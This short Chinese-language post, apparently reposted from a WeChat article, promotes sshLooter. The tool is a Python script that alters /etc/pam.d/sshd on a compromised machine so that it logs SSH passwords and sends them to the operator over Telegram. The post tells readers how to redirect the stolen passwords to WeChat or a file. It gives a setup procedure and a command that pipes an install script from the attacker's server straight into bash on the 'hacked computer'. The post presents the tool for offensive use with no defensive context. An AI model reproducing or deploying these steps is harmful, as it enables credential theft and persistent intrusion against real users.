sshLooter是一个Python脚本,它使用PAM模块通过记录密码来窃取SSH密码,并在用户登录时通过Telegram通知脚本管理员,而不是通过不太可靠的strace。
通过修改/etc/pam.d/sshd,达到记录ssh密码,由于他会把记录到的密码发送到telegram,针对某些目标不是很方便,可以修改sendMessage函数达到发送到微信或者记录到文件。
安装
git clone https://github.com/mthbernardes/sshLooter.gitcd sshLooter
组态
编辑install.sh上的脚本,并添加您的电报bot api和您的用户ID。在电报上打电话给@botfather创建一个机器人并调用@userinfobot来获取你的用户ID。
用法
在被黑的计算机上执行 curl http:// yourserverip:8000 / install.sh | bash在您的服务器上执行 python -m SimpleHTTPServer
下载地址:https://github.com/mthbernardes/sshLooter
你可能喜欢
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650454019&idx=4&sn=c03a76f38cfab2589fc59b7b58594842&chksm=83bbdde7b4cc54f162fb8f3b83a741b372b54dcde2ce3d66397c914bbdd6025f5cbbe2064892&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh